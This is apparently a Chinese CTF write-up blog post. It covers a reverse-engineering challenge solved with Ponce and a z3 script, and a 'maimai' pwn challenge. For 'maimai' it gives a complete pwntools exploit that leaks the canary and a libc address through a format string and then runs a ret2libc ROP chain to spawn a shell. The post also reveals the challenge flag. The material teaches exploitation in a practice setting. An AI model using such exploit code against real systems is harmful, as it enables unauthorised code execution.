flag[17] = -105      * (39       * (2 * (flag[17] & (-105 * (39 * (2 * ((flag[1] ^ 0x17) & 0xF9) + (flag[1] ^ 0xEE)) + 23) + 111))        + (flag[17] ^ (-105 * (39 * (2 * ((flag[1] ^ 0x17) & 0xF9) + (flag[1] ^ 0xEE)) + 23) + 111)))       + 23)      + 111
flag[18] = -105 * (39 * (2 * ((flag[17] ^ flag[15]) & flag[18]) + (flag[17] ^ flag[15] ^ flag[18])) + 23) + 111
flag[19] = -105      * (39       * (2 * (flag[12] & (-105 * (39 * (2 * (flag[14] & flag[19]) + (flag[14] ^ flag[19])) + 23) + 111))        + (flag[12] ^ (-105 * (39 * (2 * (flag[14] & flag[19]) + (flag[14] ^ flag[19])) + 23) + 111)))       + 23)      + 111
flag[20] = -105 * (39 * (2 * (flag[20] & flag[11]) + (flag[20] ^ flag[11])) + 23) + 111
flag[21] = -105      * (39       * (2 * (flag[8] & (-105 * (39 * (2 * (flag[21] & flag[6]) + (flag[21] ^ flag[6])) + 23) + 111))        + (flag[8] ^ (-105 * (39 * (2 * (flag[21] & flag[6]) + (flag[21] ^ flag[6])) + 23) + 111)))       + 23)      + 111
flag[22] = -105 * (39 * (2 * (flag[5] & flag[22]) + (flag[5] ^ flag[22])) + 23) + 111
flag[23] = -105 * (39 * (2 * ((flag[0] ^ flag[2]) & flag[23]) + (flag[0] ^ flag[2] ^ flag[23])) + 23) + 111
flag[24] = -105      * (39       * (2 * (flag[24] & (-105 * (39 * (2 * (flag[1] & 0x18) + (flag[1] ^ 0x18)) + 23) + 111))        + (flag[24] ^ (-105 * (39 * (2 * (flag[1] & 0x18) + (flag[1] ^ 0x18)) + 23) + 111)))       + 23)      + 111

然后用Ponce直接符号化运行,断点下在最后While循环里面那个判断的地方

解出约束如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
"""
- SymVar_1: 0xe1 
 - SymVar_2: 0x77 (w)
 - SymVar_3: 0x15 
 - SymVar_4: 0x9c 
 - SymVar_5: 0x28 (()
 - SymVar_6: 0x8c 
 - SymVar_7: 0x11 
 - SymVar_8: 0x4e (N)
 - SymVar_9: 0x9c 
 - SymVar_10: 0x93 
 - SymVar_11: 0x31 (1)
 - SymVar_12: 0xf0 
 - SymVar_13: 0x43 (C)
 - SymVar_14: 0x45 (E)
 - SymVar_15: 0x1f 
 - SymVar_16: 0x17 
 - SymVar_17: 0x98 
 - SymVar_18: 0xb8 
 - SymVar_19: 0x14 
 - SymVar_20: 0xa3 
 - SymVar_21: 0x63 (c)
 - SymVar_22: 0x26 (&)
 - SymVar_23: 0xf4 
 - SymVar_24: 0x5c (\)
 - SymVar_25: 0xc 
"""

再配合前面的运算z3解出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
from z3 import *

enc = [0xe1, 0x77, 0x15, 0x9c, 0x28, 0x8c, 0x11, 0x4e, 0x9c, 0x93, 0x31, 0xf0, 0x43, 0x45, 0x1f, 0x17, 0x98, 0xb8, 0x14,
       0xa3, 0x63, 0x26, 0xf4, 0x5c, 0xc]

flag = [BitVec('flag_%d' % (i),8)for i in range(25)]
s = Solver()

flag[0] = -105         * (39          * (2           * (flag[0] & (-105                      * (39                       * (2 * (flag[11] & (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111))                        + (flag[11] ^ (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111)))                       + 23)                      + 111))           + (flag[0] ^ (-105                      * (39                       * (2 * (flag[11] & (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111))                        + (flag[11] ^ (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111)))                       + 23)                      + 111)))          + 23)         + 111
flag[1] = -105 * (39 * (2 * ((flag[13] ^ flag[14]) & flag[1]) + (flag[13] ^ flag[14] ^ flag[1])) + 23) + 111
flag[2] = -105      * (39       * (2 * (flag[2] & (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111))        + (flag[2] ^ (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111)))       + 23)      + 111
flag[3] = -105 * (39 * (2 * ((flag[17] ^ 0x17) & flag[3]) + (flag[17] ^ 0x17 ^ flag[3])) + 23) + 111
flag[4] = -105      * (39       * (2        * (flag[4] & (-105                * (39                 * (2 * (flag[20] & (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111))                  + (flag[20] ^ (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111)))                 + 23)                + 111))        + (flag[4] ^ (-105                * (39                 * (2 * (flag[20] & (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111))                  + (flag[20] ^ (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111)))                 + 23)                + 111)))       + 23)      + 111
flag[5] = -105 * (39 * (2 * (flag[5] & (~flag[23] + flag[21] + 1)) + (flag[5] ^ (~flag[23] + flag[21] + 1))) + 23) + 111
flag[6] = -105      * (39       * (2 * (flag[6] & (-105 * (39 * (2 * (flag[8] & flag[7]) + (flag[8] ^ flag[7])) + 23) + 111))        + (flag[6] ^ (-105 * (39 * (2 * (flag[8] & flag[7]) + (flag[8] ^ flag[7])) + 23) + 111)))       + 23)      + 111
flag[7] = -105      * (39       * (2 * (flag[7] & (-105 * (39 * (2 * ((~flag[20] + flag[23] + 1) & 0x11) + ((~flag[20] + flag[23] + 1) ^ 0x11)) + 23) + 111))        + (flag[7] ^ (-105 * (39 * (2 * ((~flag[20] + flag[23] + 1) & 0x11) + ((~flag[20] + flag[23] + 1) ^ 0x11)) + 23) + 111)))       + 23)      + 111
flag[8] = -105      * (39       * (2 * (flag[8] & (flag[19] ^ (-105 * (39 * (2 * (flag[18] & 1) + (flag[18] ^ 1)) + 23) + 111)))        + (flag[8] ^ flag[19] ^ (-105 * (39 * (2 * (flag[18] & 1) + (flag[18] ^ 1)) + 23) + 111)))       + 23)      + 111
flag[9] = ~flag[16] + -105 * (39 * (2 * (flag[17] & flag[9]) + (flag[17] ^ flag[9])) + 23) + 111 + 1
flag[10] = -105      * (39       * (2 * (flag[10] & (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111))        + (flag[10] ^ (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111)))       + 23)      + 111
flag[11] = -105      * (39       * (2        * (flag[12] & (-105                * (39                 * (2 * (flag[13] & (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111))                  + (flag[13] ^ (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111)))                 + 23)                + 111))        + (flag[12] ^ (-105                * (39                 * (2 * (flag[13] & (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111))                  + (flag[13] ^ (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111)))                 + 23)                + 111)))       + 23)      + 111
flag[12] = -105 * (39 * (2 * (flag[12] & flag[11]) + (flag[12] ^ flag[11])) + 23) + 111
flag[13] = -105 * (39 * (2 * (flag[13] & (flag[7] ^ flag[8])) + (flag[13] ^ flag[7] ^ flag[8])) + 23) + 111
flag[14] = -105      * (39       * (2        * (flag[5] & (-105                * (39                 * (2 * (flag[4] & (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111))                  + (flag[4] ^ (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111)))                 + 23)                + 111))        + (flag[5] ^ (-105                * (39                 * (2 * (flag[4] & (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111))                  + (flag[4] ^ (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111)))                 + 23)                + 111)))       + 23)      + 111
flag[15] = -105      * (39       * (2 * (flag[3] & (-105 * (39 * (2 * (flag[15] & 8) + (flag[15] ^ 8)) + 23) + 111))        + (flag[3] ^ (-105 * (39 * (2 * (flag[15] & 8) + (flag[15] ^ 8)) + 23) + 111)))       + 23)      + 111
flag[16] = -105 * (39 * (2 * ((flag[2] ^ 0x4D) & flag[16]) + (flag[2] ^ 0x4D ^ flag[16])) + 23) + 111
flag[17] = -105      * (39       * (2 * (flag[17] & (-105 * (39 * (2 * ((flag[1] ^ 0x17) & 0xF9) + (flag[1] ^ 0xEE)) + 23) + 111))        + (flag[17] ^ (-105 * (39 * (2 * ((flag[1] ^ 0x17) & 0xF9) + (flag[1] ^ 0xEE)) + 23) + 111)))       + 23)      + 111
flag[18] = -105 * (39 * (2 * ((flag[17] ^ flag[15]) & flag[18]) + (flag[17] ^ flag[15] ^ flag[18])) + 23) + 111
flag[19] = -105      * (39       * (2 * (flag[12] & (-105 * (39 * (2 * (flag[14] & flag[19]) + (flag[14] ^ flag[19])) + 23) + 111))        + (flag[12] ^ (-105 * (39 * (2 * (flag[14] & flag[19]) + (flag[14] ^ flag[19])) + 23) + 111)))       + 23)      + 111
flag[20] = -105 * (39 * (2 * (flag[20] & flag[11]) + (flag[20] ^ flag[11])) + 23) + 111
flag[21] = -105      * (39       * (2 * (flag[8] & (-105 * (39 * (2 * (flag[21] & flag[6]) + (flag[21] ^ flag[6])) + 23) + 111))        + (flag[8] ^ (-105 * (39 * (2 * (flag[21] & flag[6]) + (flag[21] ^ flag[6])) + 23) + 111)))       + 23)      + 111
flag[22] = -105 * (39 * (2 * (flag[5] & flag[22]) + (flag[5] ^ flag[22])) + 23) + 111
flag[23] = -105 * (39 * (2 * ((flag[0] ^ flag[2]) & flag[23]) + (flag[0] ^ flag[2] ^ flag[23])) + 23) + 111
flag[24] = -105      * (39       * (2 * (flag[24] & (-105 * (39 * (2 * (flag[1] & 0x18) + (flag[1] ^ 0x18)) + 23) + 111))        + (flag[24] ^ (-105 * (39 * (2 * (flag[1] & 0x18) + (flag[1] ^ 0x18)) + 23) + 111)))       + 23)      + 111

for i in range(25):
       s.add(flag[i] == enc[i])

s.check()
m = s.model()

flag = [BitVec('flag_%d' % (i),8)for i in range(25)]

for i in flag:
    print(chr(m[i].as_long()), end='')
    
  #NKCTF{THut_1Ss_s@_eAsyhh}

NKCTF - maimai

格式化字符串+栈溢出漏洞,挺入门的一个题目,对我这个pwn新手友好.

大体思路就是通过格式化字符串漏洞泄漏cannarye和栈上的一个libc地址,然后计算偏移得到libc基地址,然后就是常规ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from pwn import *
from pwn import p32,u32,p64,u64,p8

context.terminal = ['tmux','splitw','-h']
# context.log_level = "debug"
r = process("./1")
# r = gdb.debug("./1","b *$rebase(0x19E9)")
elf = ELF("./1")
libc = ELF("./libc.so.6")
put_plt = elf.plt['puts']
pus_got = elf.got['puts']
cannary = 0
__libc_start_call_main = 0
libc_base = 0

def add():
    r.recvuntil(b"Select a option:")
    r.sendline(b"1")
    r.recvuntil(b"Input chart level and rank.")
    for i in range(49):
        r.sendline(b"0.0 0")
    r.sendline(b"1550.0 SSS+")

def com_cannary():
    global cannary
    r.recvuntil(b"Select a option:")
    r.sendline(b"2")
    r.recvuntil(b"Input your nickname.")
    r.sendline(b"%7$p")
    r.recvuntil(b"0x")
    cannary = int(r.recvline(16),base=16)    
    r.recvuntil(b"Can you teach me how to play maimai?")
    # payload = b"a"*40 + p64(cannary)
    r.sendline('1')

def com_base():
    global __libc_start_call_main
    r.recvuntil(b"Select a option:")
    r.sendline(b"2")
    r.recvuntil(b"Input your nickname.")
    r.sendline(b"%13$p")
    r.recvuntil(b"0x")
    __libc_start_call_main = int(r.recvline(16),base=16)
    # print(hex(__libc_start_call_main))


def exploit():
    global libc_base
    libc_base = __libc_start_call_main - 171408
    pop_rdi = libc_base + 0x2a3e5
    bin_sh = libc_base + next(libc.search("/bin/sh\x00"))
    system = libc_base + libc.sym['system']
    ret = libc_base + 0x29139
    r.recvuntil(b"Can you teach me how to play maimai?")
    payload = b"a"*40 + p64(cannary) + b'a'*8 + p64(pop_rdi) + p64(bin_sh) +p64(ret) + p64(system)
    r.sendline(payload)


add()
com_cannary()
com_base()
exploit()

r.interactive()


CTF > Reverse > wp
#reverse #z3
AliyunCTF & NKCTF
http://example.com/2024/03/24/Ali_NK/
Author
yring
Posted on
March 24, 2024
Licensed under